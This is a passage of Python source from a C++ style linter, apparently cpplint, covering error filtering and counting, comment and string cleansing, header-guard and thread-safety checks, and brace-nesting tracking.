if not (filt.startswith('+') or filt.startswith('-')):
raise ValueError('Every filter in --filters must start with + or -'
' (%s does not)' % filt)
def ResetErrorCounts(self):
"""Sets the module's error statistic back to zero."""
self.error_count = 0
self.errors_by_category = {}
def IncrementErrorCount(self, category):
"""Bumps the module's error statistic."""
self.error_count += 1
if self.counting in ('toplevel', 'detailed'):
if self.counting != 'detailed':
category = category.split('/')[0]
if category not in self.errors_by_category:
self.errors_by_category[category] = 0
self.errors_by_category[category] += 1
def PrintErrorCounts(self):
"""Print a summary of errors by category, and the total."""
for category, count in self.errors_by_category.iteritems():
sys.stderr.write('Category \'%s\' errors found: %d\n' %
(category, count))
sys.stderr.write('Total errors found: %d\n' % self.error_count)
_cpplint_state = _CppLintState()
def _OutputFormat():
"""Gets the module's output format."""
return _cpplint_state.output_format
def _SetOutputFormat(output_format):
"""Sets the module's output format."""
_cpplint_state.SetOutputFormat(output_format)
def _VerboseLevel():
"""Returns the module's verbosity setting."""
return _cpplint_state.verbose_level
def _SetVerboseLevel(level):
"""Sets the module's verbosity, and returns the previous setting."""
return _cpplint_state.SetVerboseLevel(level)
def _SetCountingStyle(level):
"""Sets the module's counting options."""
_cpplint_state.SetCountingStyle(level)
def _Filters():
"""Returns the module's list of output filters, as a list."""
return _cpplint_state.filters
def _SetFilters(filters):
"""Sets the module's error-message filters.
These filters are applied when deciding whether to emit a given
error message.
Args:
filters: A string of comma-separated filters (eg "whitespace/indent").
Each filter should start with + or -; else we die.
"""
_cpplint_state.SetFilters(filters)
class _FunctionState(object):
"""Tracks current function name and the number of lines in its body."""
_NORMAL_TRIGGER = 250 # for --v=0, 500 for --v=1, etc.
_TEST_TRIGGER = 400 # about 50% more than _NORMAL_TRIGGER.
def __init__(self):
self.in_a_function = False
self.lines_in_function = 0
self.current_function = ''
def Begin(self, function_name):
"""Start analyzing function body.
Args:
function_name: The name of the function being tracked.
"""
self.in_a_function = True
self.lines_in_function = 0
self.current_function = function_name
def Count(self):
"""Count line in current function body."""
if self.in_a_function:
self.lines_in_function += 1
def Check(self, error, filename, linenum):
"""Report if too many lines in function body.
Args:
error: The function to call with any errors found.
filename: The name of the current file.
linenum: The number of the line to check.
"""
if Match(r'T(EST|est)', self.current_function):
base_trigger = self._TEST_TRIGGER
else:
base_trigger = self._NORMAL_TRIGGER
trigger = base_trigger * 2**_VerboseLevel()
if self.lines_in_function > trigger:
error_level = int(math.log(self.lines_in_function / base_trigger, 2))
      # For the default trigger of 250: 250 => 0, 500 => 1, 1000 => 2, ...
if error_level > 5:
error_level = 5
error(filename, linenum, 'readability/fn_size', error_level,
'Small and focused functions are preferred:'
' %s has %d non-comment lines'
' (error triggered by exceeding %d lines).' % (
self.current_function, self.lines_in_function, trigger))
def End(self):
"""Stop analyzing function body."""
self.in_a_function = False
class _IncludeError(Exception):
"""Indicates a problem with the include order in a file."""
pass
class FileInfo:
"""Provides utility functions for filenames.
FileInfo provides easy access to the components of a file's path
relative to the project root.
"""
def __init__(self, filename):
self._filename = filename
def FullName(self):
"""Make Windows paths like Unix."""
return os.path.abspath(self._filename).replace('\\', '/')
def RepositoryName(self):
"""FullName after removing the local path to the repository.
If we have a real absolute path name here we can try to do something smart:
detecting the root of the checkout and truncating /path/to/checkout from
the name so that we get header guards that don't include things like
"C:\Documents and Settings\..." or "/home/username/..." in them and thus
people on different computers who have checked the source out to different
locations won't see bogus errors.
"""
fullname = self.FullName()
if os.path.exists(fullname):
project_dir = os.path.dirname(fullname)
if os.path.exists(os.path.join(project_dir, ".svn")):
# If there's a .svn file in the current directory, we recursively look
# up the directory tree for the top of the SVN checkout
root_dir = project_dir
one_up_dir = os.path.dirname(root_dir)
while os.path.exists(os.path.join(one_up_dir, ".svn")):
root_dir = os.path.dirname(root_dir)
one_up_dir = os.path.dirname(one_up_dir)
prefix = os.path.commonprefix([root_dir, project_dir])
return fullname[len(prefix) + 1:]
# Not SVN <= 1.6? Try to find a git, hg, or svn top level directory by
# searching up from the current path.
root_dir = os.path.dirname(fullname)
while (root_dir != os.path.dirname(root_dir) and
not os.path.exists(os.path.join(root_dir, ".git")) and
not os.path.exists(os.path.join(root_dir, ".hg")) and
not os.path.exists(os.path.join(root_dir, ".svn"))):
root_dir = os.path.dirname(root_dir)
if (os.path.exists(os.path.join(root_dir, ".git")) or
os.path.exists(os.path.join(root_dir, ".hg")) or
os.path.exists(os.path.join(root_dir, ".svn"))):
prefix = os.path.commonprefix([root_dir, project_dir])
return fullname[len(prefix) + 1:]
# Don't know what to do; header guard warnings may be wrong...
return fullname
def Split(self):
"""Splits the file into the directory, basename, and extension.
For 'chrome/browser/browser.cc', Split() would
return ('chrome/browser', 'browser', '.cc')
Returns:
A tuple of (directory, basename, extension).
"""
googlename = self.RepositoryName()
project, rest = os.path.split(googlename)
return (project,) + os.path.splitext(rest)
def BaseName(self):
"""File base name - text after the final slash, before the final period."""
return self.Split()[1]
def Extension(self):
"""File extension - text following the final period."""
return self.Split()[2]
def NoExtension(self):
"""File has no source file extension."""
return '/'.join(self.Split()[0:2])
def IsSource(self):
"""File has a source file extension."""
return self.Extension()[1:] in ('c', 'cc', 'cpp', 'cxx')
def _ShouldPrintError(category, confidence, linenum):
"""If confidence >= verbose, category passes filter and is not suppressed."""
# There are three ways we might decide not to print an error message:
# a "NOLINT(category)" comment appears in the source,
# the verbosity level isn't high enough, or the filters filter it out.
if IsErrorSuppressedByNolint(category, linenum):
return False
if confidence < _cpplint_state.verbose_level:
return False
is_filtered = False
for one_filter in _Filters():
if one_filter.startswith('-'):
if category.startswith(one_filter[1:]):
is_filtered = True
elif one_filter.startswith('+'):
if category.startswith(one_filter[1:]):
is_filtered = False
else:
assert False # should have been checked for in SetFilter.
if is_filtered:
return False
return True
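The filter loop above evaluates entries left to right, with the last matching `+`/`-` prefix winning; that is what makes `--filter=-whitespace,+whitespace/braces` re-enable only the braces subcategory. A standalone sketch of just that loop (the `is_filtered` helper is illustrative):

```python
def is_filtered(category, filters):
    """Left-to-right filter evaluation; last matching prefix wins."""
    filtered = False
    for f in filters:
        if f.startswith('-') and category.startswith(f[1:]):
            filtered = True
        elif f.startswith('+') and category.startswith(f[1:]):
            filtered = False
    return filtered
```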
def Error(filename, linenum, category, confidence, message):
"""Logs the fact we've found a lint error.
We log where the error was found, and also our confidence in the error,
that is, how certain we are this is a legitimate style regression, and
not a misidentification or a use that's sometimes justified.
False positives can be suppressed by the use of
"cpplint(category)" comments on the offending line. These are
parsed into _error_suppressions.
Args:
filename: The name of the file containing the error.
linenum: The number of the line containing the error.
category: A string used to describe the "category" this bug
falls under: "whitespace", say, or "runtime". Categories
may have a hierarchy separated by slashes: "whitespace/indent".
confidence: A number from 1-5 representing a confidence score for
the error, with 5 meaning that we are certain of the problem,
and 1 meaning that it could be a legitimate construct.
message: The error message.
"""
if _ShouldPrintError(category, confidence, linenum):
_cpplint_state.IncrementErrorCount(category)
if _cpplint_state.output_format == 'vs7':
sys.stderr.write('%s(%s): %s [%s] [%d]\n' % (
filename, linenum, message, category, confidence))
elif _cpplint_state.output_format == 'eclipse':
sys.stderr.write('%s:%s: warning: %s [%s] [%d]\n' % (
filename, linenum, message, category, confidence))
else:
sys.stderr.write('%s:%s: %s [%s] [%d]\n' % (
filename, linenum, message, category, confidence))
# Matches standard C++ escape sequences per 2.13.2.3 of the C++ standard.
_RE_PATTERN_CLEANSE_LINE_ESCAPES = re.compile(
r'\\([abfnrtv?"\\\']|\d+|x[0-9a-fA-F]+)')
# Matches strings. Escape codes should already be removed by ESCAPES.
_RE_PATTERN_CLEANSE_LINE_DOUBLE_QUOTES = re.compile(r'"[^"]*"')
# Matches characters. Escape codes should already be removed by ESCAPES.
_RE_PATTERN_CLEANSE_LINE_SINGLE_QUOTES = re.compile(r"'.'")
# Matches multi-line C++ comments.
# This RE is a little more complicated than one might expect, because we
# have to take care of spacing around the removed comment so we can handle
# comments inside statements better.
# The current rule is: we only strip spaces from both sides when the comment
# sits at the end of the line. Otherwise, we try to remove spaces from the
# right side; if that doesn't work, we strip the left side, but only when a
# non-word character follows on the right.
_RE_PATTERN_CLEANSE_LINE_C_COMMENTS = re.compile(
r"""(\s*/\*.*\*/\s*$|
/\*.*\*/\s+|
\s+/\*.*\*/(?=\W)|
/\*.*\*/)""", re.VERBOSE)
def IsCppString(line):
"""Does line terminate so, that the next symbol is in string constant.
This function does not consider single-line nor multi-line comments.
Args:
    line: a partial line of code, from column 0 up to the current position.
Returns:
True, if next character appended to 'line' is inside a
string constant.
"""
line = line.replace(r'\\', 'XX') # after this, \\" does not match to \"
return ((line.count('"') - line.count(r'\"') - line.count("'\"'")) & 1) == 1
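The quote-counting trick above first neutralizes escaped backslashes (so `\\"` is not mistaken for an escaped quote), then checks whether the number of unescaped double quotes seen so far is odd. A standalone sketch (the `ends_inside_string` name is illustrative):

```python
def ends_inside_string(line):
    """True if a character appended to this line would land in a string."""
    line = line.replace(r'\\', 'XX')   # after this, \\" no longer matches \"
    unescaped = line.count('"') - line.count(r'\"') - line.count("'\"'")
    return unescaped % 2 == 1
```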
def FindNextMultiLineCommentStart(lines, lineix):
"""Find the beginning marker for a multiline comment."""
while lineix < len(lines):
if lines[lineix].strip().startswith('/*'):
# Only return this marker if the comment goes beyond this line
if lines[lineix].strip().find('*/', 2) < 0:
return lineix
lineix += 1
return len(lines)
def FindNextMultiLineCommentEnd(lines, lineix):
"""We are inside a comment, find the end marker."""
while lineix < len(lines):
if lines[lineix].strip().endswith('*/'):
return lineix
lineix += 1
return len(lines)
def RemoveMultiLineCommentsFromRange(lines, begin, end):
"""Clears a range of lines for multi-line comments."""
# Having // dummy comments makes the lines non-empty, so we will not get
# unnecessary blank line warnings later in the code.
for i in range(begin, end):
lines[i] = '// dummy'
def RemoveMultiLineComments(filename, lines, error):
"""Removes multiline (c-style) comments from lines."""
lineix = 0
while lineix < len(lines):
lineix_begin = FindNextMultiLineCommentStart(lines, lineix)
if lineix_begin >= len(lines):
return
lineix_end = FindNextMultiLineCommentEnd(lines, lineix_begin)
if lineix_end >= len(lines):
error(filename, lineix_begin + 1, 'readability/multiline_comment', 5,
'Could not find end of multi-line comment')
return
RemoveMultiLineCommentsFromRange(lines, lineix_begin, lineix_end + 1)
lineix = lineix_end + 1
def CleanseComments(line):
"""Removes //-comments and single-line C-style /* */ comments.
Args:
line: A line of C++ source.
Returns:
The line with single-line comments removed.
"""
commentpos = line.find('//')
if commentpos != -1 and not IsCppString(line[:commentpos]):
line = line[:commentpos].rstrip()
# get rid of /* ... */
return _RE_PATTERN_CLEANSE_LINE_C_COMMENTS.sub('', line)
class CleansedLines(object):
"""Holds 3 copies of all lines with different preprocessing applied to them.
1) elided member contains lines without strings and comments,
2) lines member contains lines without comments, and
3) raw_lines member contains all the lines without processing.
All these three members are of <type 'list'>, and of the same length.
"""
def __init__(self, lines):
self.elided = []
self.lines = []
self.raw_lines = lines
self.num_lines = len(lines)
for linenum in range(len(lines)):
self.lines.append(CleanseComments(lines[linenum]))
elided = self._CollapseStrings(lines[linenum])
self.elided.append(CleanseComments(elided))
def NumLines(self):
"""Returns the number of lines represented."""
return self.num_lines
@staticmethod
def _CollapseStrings(elided):
"""Collapses strings and chars on a line to simple "" or '' blocks.
We nix strings first so we're not fooled by text like '"http://"'
Args:
elided: The line being processed.
Returns:
The line with collapsed strings.
"""
if not _RE_PATTERN_INCLUDE.match(elided):
# Remove escaped characters first to make quote/single quote collapsing
# basic. Things that look like escaped characters shouldn't occur
# outside of strings and chars.
elided = _RE_PATTERN_CLEANSE_LINE_ESCAPES.sub('', elided)
elided = _RE_PATTERN_CLEANSE_LINE_SINGLE_QUOTES.sub("''", elided)
elided = _RE_PATTERN_CLEANSE_LINE_DOUBLE_QUOTES.sub('""', elided)
return elided
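The ordering in `_CollapseStrings` matters: escape sequences are removed first so that the quote-matching regexps only ever see "clean" literals. A standalone sketch with the same three substitutions (the regexp names and `collapse` helper are illustrative):

```python
import re

# Same order as _CollapseStrings: escapes, then chars, then strings.
_escapes = re.compile(r'\\([abfnrtv?"\\\']|\d+|x[0-9a-fA-F]+)')
_chars = re.compile(r"'.'")
_strings = re.compile(r'"[^"]*"')

def collapse(line):
    """Collapse string and char literals on a line to "" and ''."""
    line = _escapes.sub('', line)
    line = _chars.sub("''", line)
    line = _strings.sub('""', line)
    return line
```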
def FindEndOfExpressionInLine(line, startpos, depth, startchar, endchar):
"""Find the position just after the matching endchar.
Args:
line: a CleansedLines line.
startpos: start searching at this position.
depth: nesting level at startpos.
startchar: expression opening character.
endchar: expression closing character.
Returns:
Index just after endchar.
"""
for i in xrange(startpos, len(line)):
if line[i] == startchar:
depth += 1
elif line[i] == endchar:
depth -= 1
if depth == 0:
return i + 1
return -1
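The depth-tracking walk above is self-contained enough to restate as a sketch (the `find_close` name is illustrative): increment on the opening character, decrement on the closing one, and return the index just past the match, or -1 if the expression does not close on this line:

```python
def find_close(line, startpos, depth, startchar, endchar):
    """Position just after the matching endchar, or -1 if not on this line."""
    for i in range(startpos, len(line)):
        if line[i] == startchar:
            depth += 1
        elif line[i] == endchar:
            depth -= 1
            if depth == 0:
                return i + 1
    return -1
```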
def CloseExpression(clean_lines, linenum, pos):
"""If input points to ( or { or [, finds the position that closes it.
If lines[linenum][pos] points to a '(' or '{' or '[', finds the
linenum/pos that correspond to the closing of the expression.
Args:
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
pos: A position on the line.
Returns:
A tuple (line, linenum, pos) pointer *past* the closing brace, or
(line, len(lines), -1) if we never find a close. Note we ignore
strings and comments when matching; and the line we return is the
'cleansed' line at linenum.
"""
line = clean_lines.elided[linenum]
startchar = line[pos]
if startchar not in '({[':
return (line, clean_lines.NumLines(), -1)
if startchar == '(': endchar = ')'
if startchar == '[': endchar = ']'
if startchar == '{': endchar = '}'
# Check first line
end_pos = FindEndOfExpressionInLine(line, pos, 0, startchar, endchar)
if end_pos > -1:
return (line, linenum, end_pos)
tail = line[pos:]
num_open = tail.count(startchar) - tail.count(endchar)
while linenum < clean_lines.NumLines() - 1:
linenum += 1
line = clean_lines.elided[linenum]
delta = line.count(startchar) - line.count(endchar)
if num_open + delta <= 0:
return (line, linenum,
FindEndOfExpressionInLine(line, 0, num_open, startchar, endchar))
num_open += delta
# Did not find endchar before end of file, give up
return (line, clean_lines.NumLines(), -1)
def CheckForCopyright(filename, lines, error):
"""Logs an error if no Copyright message appears at the top of the file."""
# We'll say it should occur by line 10. Don't forget there's a
# dummy line at the front.
for line in xrange(1, min(len(lines), 11)):
if re.search(r'Copyright', lines[line], re.I): break
else: # means no copyright line was found
error(filename, 0, 'legal/copyright', 5,
'No copyright message found. '
'You should have a line: "Copyright [year] <Copyright Owner>"')
def GetHeaderGuardCPPVariable(filename):
"""Returns the CPP variable that should be used as a header guard.
Args:
filename: The name of a C++ header file.
Returns:
The CPP variable that should be used as a header guard in the
named file.
"""
# Restores original filename in case that cpplint is invoked from Emacs's
# flymake.
filename = re.sub(r'_flymake\.h$', '.h', filename)
filename = re.sub(r'/\.flymake/([^/]*)$', r'/\1', filename)
fileinfo = FileInfo(filename)
file_path_from_root = fileinfo.RepositoryName()
if _root:
file_path_from_root = re.sub('^' + _root + os.sep, '', file_path_from_root)
return re.sub(r'[-./\s]', '_', file_path_from_root).upper() + '_'
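Setting aside the flymake and `_root` handling, the final line above is the core transform: path separators, dots, dashes, and whitespace become underscores, upper-cased, with a trailing `_`. A standalone sketch (`guard_for` is a hypothetical helper name):

```python
import re

def guard_for(path):
    """Map a repo-relative header path to its guard macro name."""
    return re.sub(r'[-./\s]', '_', path).upper() + '_'
```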
def CheckForHeaderGuard(filename, lines, error):
"""Checks that the file contains a header guard.
Logs an error if no #ifndef header guard is present. For other
headers, checks that the full pathname is used.
Args:
filename: The name of the C++ header file.
lines: An array of strings, each representing a line of the file.
error: The function to call with any errors found.
"""
cppvar = GetHeaderGuardCPPVariable(filename)
ifndef = None
ifndef_linenum = 0
define = None
endif = None
endif_linenum = 0
for linenum, line in enumerate(lines):
linesplit = line.split()
if len(linesplit) >= 2:
# find the first occurrence of #ifndef and #define, save arg
if not ifndef and linesplit[0] == '#ifndef':
# set ifndef to the header guard presented on the #ifndef line.
ifndef = linesplit[1]
ifndef_linenum = linenum
if not define and linesplit[0] == '#define':
define = linesplit[1]
# find the last occurrence of #endif, save entire line
if line.startswith('#endif'):
endif = line
endif_linenum = linenum
if not ifndef:
error(filename, 0, 'build/header_guard', 5,
'No #ifndef header guard found, suggested CPP variable is: %s' %
cppvar)
return
if not define:
error(filename, 0, 'build/header_guard', 5,
'No #define header guard found, suggested CPP variable is: %s' %
cppvar)
return
# The guard should be PATH_FILE_H_, but we also allow PATH_FILE_H__
# for backward compatibility.
if ifndef != cppvar:
error_level = 0
if ifndef != cppvar + '_':
error_level = 5
ParseNolintSuppressions(filename, lines[ifndef_linenum], ifndef_linenum,
error)
error(filename, ifndef_linenum, 'build/header_guard', error_level,
'#ifndef header guard has wrong style, please use: %s' % cppvar)
if define != ifndef:
error(filename, 0, 'build/header_guard', 5,
'#ifndef and #define don\'t match, suggested CPP variable is: %s' %
cppvar)
return
if endif != ('#endif // %s' % cppvar):
error_level = 0
if endif != ('#endif // %s' % (cppvar + '_')):
error_level = 5
ParseNolintSuppressions(filename, lines[endif_linenum], endif_linenum,
error)
error(filename, endif_linenum, 'build/header_guard', error_level,
'#endif line should be "#endif // %s"' % cppvar)
def CheckForUnicodeReplacementCharacters(filename, lines, error):
"""Logs an error for each line containing Unicode replacement characters.
These indicate that either the file contained invalid UTF-8 (likely)
or Unicode replacement characters (which it shouldn't). Note that
it's possible for this to throw off line numbering if the invalid
UTF-8 occurred adjacent to a newline.
Args:
filename: The name of the current file.
lines: An array of strings, each representing a line of the file.
error: The function to call with any errors found.
"""
for linenum, line in enumerate(lines):
if u'\ufffd' in line:
error(filename, linenum, 'readability/utf8', 5,
'Line contains invalid UTF-8 (or Unicode replacement character).')
def CheckForNewlineAtEOF(filename, lines, error):
"""Logs an error if there is no newline char at the end of the file.
Args:
filename: The name of the current file.
lines: An array of strings, each representing a line of the file.
error: The function to call with any errors found.
"""
# The array lines() was created by adding two newlines to the
# original file (go figure), then splitting on \n.
# To verify that the file ends in \n, we just have to make sure the
# last-but-two element of lines() exists and is empty.
if len(lines) < 3 or lines[-2]:
error(filename, len(lines) - 2, 'whitespace/ending_newline', 5,
'Could not find a newline character at the end of the file.')
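The `lines[-2]` trick depends on how the lines array is built elsewhere in the linter: dummy marker lines bracket the split file, so a file that ends in a newline leaves an empty last-but-two element. A self-contained sketch of that invariant (the marker strings here are illustrative, not the linter's actual values):

```python
def ends_with_newline(file_text):
    # Mimic the linter's construction: dummy lines bracket the split file.
    lines = ['<begin marker>'] + file_text.split('\n') + ['<end marker>']
    # If the file ended with '\n', the split leaves '' just before the
    # trailing marker; otherwise the last real line sits there instead.
    return len(lines) >= 3 and not lines[-2]
```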
def CheckForMultilineCommentsAndStrings(filename, clean_lines, linenum, error):
"""Logs an error if we see /* ... */ or "..." that extend past one line.
/* ... */ comments are legit inside macros, for one line.
Otherwise, we prefer // comments, so it's ok to warn about the
other. Likewise, it's ok for strings to extend across multiple
lines, as long as a line continuation character (backslash)
terminates each line. Although not currently prohibited by the C++
style guide, it's ugly and unnecessary. We don't do well with either
in this lint program, so we warn about both.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
line = clean_lines.elided[linenum]
# Remove all \\ (escaped backslashes) from the line. They are OK, and the
# second (escaped) slash may trigger later \" detection erroneously.
line = line.replace('\\\\', '')
if line.count('/*') > line.count('*/'):
error(filename, linenum, 'readability/multiline_comment', 5,
'Complex multi-line /*...*/-style comment found. '
'Lint may give bogus warnings. '
'Consider replacing these with //-style comments, '
'with #if 0...#endif, '
'or with more clearly structured multi-line comments.')
if (line.count('"') - line.count('\\"')) % 2:
error(filename, linenum, 'readability/multiline_string', 5,
'Multi-line string ("...") found. This lint script doesn\'t '
'do well with such strings, and may give bogus warnings. They\'re '
'ugly and unnecessary, and you should use concatenation instead.')
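The quote-parity heuristic above can be exercised on its own: after dropping escaped backslashes, an odd count of unescaped double quotes means the line leaves a string literal open. A standalone sketch (hypothetical helper, not this module's API):

```python
def has_unterminated_string(line):
    line = line.replace('\\\\', '')  # drop escaped backslashes first
    # An odd number of unescaped quotes => a string spills onto the next line.
    return (line.count('"') - line.count('\\"')) % 2 == 1
```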
threading_list = (
('asctime(', 'asctime_r('),
('ctime(', 'ctime_r('),
('getgrgid(', 'getgrgid_r('),
('getgrnam(', 'getgrnam_r('),
('getlogin(', 'getlogin_r('),
('getpwnam(', 'getpwnam_r('),
('getpwuid(', 'getpwuid_r('),
('gmtime(', 'gmtime_r('),
('localtime(', 'localtime_r('),
('rand(', 'rand_r('),
('readdir(', 'readdir_r('),
('strtok(', 'strtok_r('),
('ttyname(', 'ttyname_r('),
)
def CheckPosixThreading(filename, clean_lines, linenum, error):
"""Checks for calls to thread-unsafe functions.
Much code was originally written without consideration of
multi-threading. Engineers also tend to rely on old experience; many
learned POSIX before the threading extensions were added. These
tests guide the engineers to use thread-safe functions (when using
posix directly).
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
line = clean_lines.elided[linenum]
for single_thread_function, multithread_safe_function in threading_list:
ix = line.find(single_thread_function)
# Comparisons made explicit for clarity -- pylint: disable-msg=C6403
if ix >= 0 and (ix == 0 or (not line[ix - 1].isalnum() and
line[ix - 1] not in ('_', '.', '>'))):
error(filename, linenum, 'runtime/threadsafe_fn', 2,
'Consider using ' + multithread_safe_function +
'...) instead of ' + single_thread_function +
'...) for improved thread safety.')
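The boundary test above is what keeps substring hits from firing: a match counts only when the preceding character cannot be part of an identifier or a member access. A standalone sketch of that test (`flags_unsafe_call` is a hypothetical name):

```python
def flags_unsafe_call(line, fn='strtok('):
    """True if `fn` appears as a standalone call, not part of another name."""
    ix = line.find(fn)
    # Reject hits preceded by identifier chars or member access ('.', '>').
    return ix >= 0 and (ix == 0 or (not line[ix - 1].isalnum() and
                                    line[ix - 1] not in ('_', '.', '>')))
```

So `strtok(` at the start of a call flags, while `my_strtok(` or `obj.strtok(` does not.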
# Matches invalid increment: *count++, which moves pointer instead of
# incrementing a value.
_RE_PATTERN_INVALID_INCREMENT = re.compile(
r'^\s*\*\w+(\+\+|--);')
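The pattern can be checked against both spellings; only the precedence-bug form matches, since `*count++` binds as `*(count++)` and moves the pointer rather than incrementing the value:

```python
import re

_RE_PATTERN_INVALID_INCREMENT = re.compile(r'^\s*\*\w+(\+\+|--);')

# The buggy form matches; the parenthesized, correct form does not.
bad = bool(_RE_PATTERN_INVALID_INCREMENT.match('  *count++;'))
ok = bool(_RE_PATTERN_INVALID_INCREMENT.match('  (*count)++;'))
```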
def CheckInvalidIncrement(filename, clean_lines, linenum, error):
"""Checks for invalid increment *count++.
For example following function:
void increment_counter(int* count) {
*count++;
}
is invalid, because it effectively does count++, moving pointer, and should
be replaced with ++*count, (*count)++ or *count += 1.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
line = clean_lines.elided[linenum]
if _RE_PATTERN_INVALID_INCREMENT.match(line):
error(filename, linenum, 'runtime/invalid_increment', 5,
'Changing pointer instead of value (or unused value of operator*).')
class _BlockInfo(object):
"""Stores information about a generic block of code."""
def __init__(self, seen_open_brace):
self.seen_open_brace = seen_open_brace
self.open_parentheses = 0
self.inline_asm = _NO_ASM
def CheckBegin(self, filename, clean_lines, linenum, error):
"""Run checks that applies to text up to the opening brace.
This is mostly for checking the text after the class identifier
and the "{", usually where the base class is specified. For other
blocks, there isn't much to check, so we always pass.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
pass
def CheckEnd(self, filename, clean_lines, linenum, error):
"""Run checks that applies to text after the closing brace.
This is mostly used for checking end of namespace comments.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
pass
class _ClassInfo(_BlockInfo):
"""Stores information about a class."""
def __init__(self, name, class_or_struct, clean_lines, linenum):
_BlockInfo.__init__(self, False)
self.name = name
self.starting_linenum = linenum
self.is_derived = False
if class_or_struct == 'struct':
self.access = 'public'
else:
self.access = 'private'
# Try to find the end of the class. This will be confused by things like:
# class A {
# } *x = { ...
#
# But it's still good enough for CheckSectionSpacing.
self.last_line = 0
depth = 0
for i in range(linenum, clean_lines.NumLines()):
line = clean_lines.elided[i]
depth += line.count('{') - line.count('}')
if not depth:
self.last_line = i
break
def CheckBegin(self, filename, clean_lines, linenum, error):
# Look for a bare ':'
if Search('(^|[^:]):($|[^:])', clean_lines.elided[linenum]):
self.is_derived = True
class _NamespaceInfo(_BlockInfo):
"""Stores information about a namespace."""
def __init__(self, name, linenum):
_BlockInfo.__init__(self, False)
self.name = name or ''
self.starting_linenum = linenum
def CheckEnd(self, filename, clean_lines, linenum, error):
"""Check end of namespace comments."""
line = clean_lines.raw_lines[linenum]
# Check how many lines are enclosed in this namespace. Don't issue
# warning for missing namespace comments if there aren't enough
# lines. However, do apply checks if there is already an end of
# namespace comment and it's incorrect.
#
# TODO(unknown): We always want to check end of namespace comments
# if a namespace is large, but sometimes we also want to apply the
# check if a short namespace contained nontrivial things (something
# other than forward declarations). There is currently no logic on
# deciding what these nontrivial things are, so this check is
# triggered by namespace size only, which works most of the time.
if (linenum - self.starting_linenum < 10
and not Match(r'};*\s*(//|/\*).*\bnamespace\b', line)):
return
# Look for matching comment at end of namespace.
#
# Note that we accept C style "/* */" comments for terminating
# namespaces, so that code that terminate namespaces inside
# preprocessor macros can be cpplint clean. Example: http://go/nxpiz
#
# We also accept stuff like "// end of namespace <name>." with the
# period at the end.
#
# Besides these, we don't accept anything else, otherwise we might
# get false negatives when existing comment is a substring of the
# expected namespace. Example: http://go/ldkdc, http://cl/23548205
if self.name:
# Named namespace
if not Match((r'};*\s*(//|/\*).*\bnamespace\s+' + re.escape(self.name) +
r'[\*/\.\\\s]*$'),
line):
error(filename, linenum, 'readability/namespace', 5,
'Namespace should be terminated with "// namespace %s"' %
self.name)
else:
# Anonymous namespace
if not Match(r'};*\s*(//|/\*).*\bnamespace[\*/\.\\\s]*$', line):
error(filename, linenum, 'readability/namespace', 5,
'Namespace should be terminated with "// namespace"')
class _PreprocessorInfo(object):
"""Stores checkpoints of nesting stacks when #if/#else is seen."""
def __init__(self, stack_before_if):
# The entire nesting stack before #if
self.stack_before_if = stack_before_if
# The entire nesting stack up to #else
self.stack_before_else = []
# Whether we have already seen #else or #elif
self.seen_else = False
class _NestingState(object):
"""Holds states related to parsing braces."""
def __init__(self):
# Stack for tracking all braces. An object is pushed whenever we
# see a "{", and popped when we see a "}". Only 3 types of
# objects are possible:
# - _ClassInfo: a class or struct.
# - _NamespaceInfo: a namespace.
# - _BlockInfo: some other type of block.
self.stack = []
# Stack of _PreprocessorInfo objects.
self.pp_stack = []
def SeenOpenBrace(self):
"""Check if we have seen the opening brace for the innermost block.
Returns:
True if we have seen the opening brace, False if the innermost
block is still expecting an opening brace.
"""
return (not self.stack) or self.stack[-1].seen_open_brace
def InNamespaceBody(self):
"""Check if we are currently one level inside a namespace body.
Returns:
True if top of the stack is a namespace block, False otherwise.
"""
return self.stack and isinstance(self.stack[-1], _NamespaceInfo)
def UpdatePreprocessor(self, line):
"""Update preprocessor stack.
We need to handle preprocessors due to classes like this:
#ifdef SWIG
struct ResultDetailsPageElementExtensionPoint {
#else
struct ResultDetailsPageElementExtensionPoint : public Extension {
#endif
(see http://go/qwddn for original example)
We make the following assumptions (good enough for most files):
- Preprocessor condition evaluates to true from #if up to first
#else/#elif/#endif.
- Preprocessor condition evaluates to false from #else/#elif up
to #endif. We still perform lint checks on these lines, but
these do not affect nesting stack.
Args:
line: current line to check.
"""
if Match(r'^\s*#\s*(if|ifdef|ifndef)\b', line):
# Beginning of #if block, save the nesting stack here. The saved
# stack will allow us to restore the parsing state in the #else case.
self.pp_stack.append(_PreprocessorInfo(copy.deepcopy(self.stack)))
elif Match(r'^\s*#\s*(else|elif)\b', line):
# Beginning of #else block
if self.pp_stack:
if not self.pp_stack[-1].seen_else:
# This is the first #else or #elif block. Remember the
# whole nesting stack up to this point. This is what we
# keep after the #endif.
self.pp_stack[-1].seen_else = True
self.pp_stack[-1].stack_before_else = copy.deepcopy(self.stack)
# Restore the stack to how it was before the #if
self.stack = copy.deepcopy(self.pp_stack[-1].stack_before_if)
else:
# TODO(unknown): unexpected #else, issue warning?
pass
elif Match(r'^\s*#\s*endif\b', line):
# End of #if or #else blocks.
if self.pp_stack:
# If we saw an #else, we will need to restore the nesting
# stack to its former state before the #else, otherwise we
# will just continue from where we left off.
if self.pp_stack[-1].seen_else:
# Here we can just use a shallow copy since we are the last
# reference to it.
self.stack = self.pp_stack[-1].stack_before_else
# Drop the corresponding #if
self.pp_stack.pop()
else:
# TODO(unknown): unexpected #endif, issue warning?
pass
def Update(self, filename, clean_lines, linenum, error):
"""Update nesting state with current line.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
line = clean_lines.elided[linenum]
# Update pp_stack first
self.UpdatePreprocessor(line)
# Count parentheses. This is to avoid adding struct arguments to
# the nesting stack.
if self.stack:
inner_block = self.stack[-1]
depth_change = line.count('(') - line.count(')')
inner_block.open_parentheses += depth_change
# Also check if we are starting or ending an inline assembly block.
if inner_block.inline_asm in (_NO_ASM, _END_ASM):
if (depth_change != 0 and
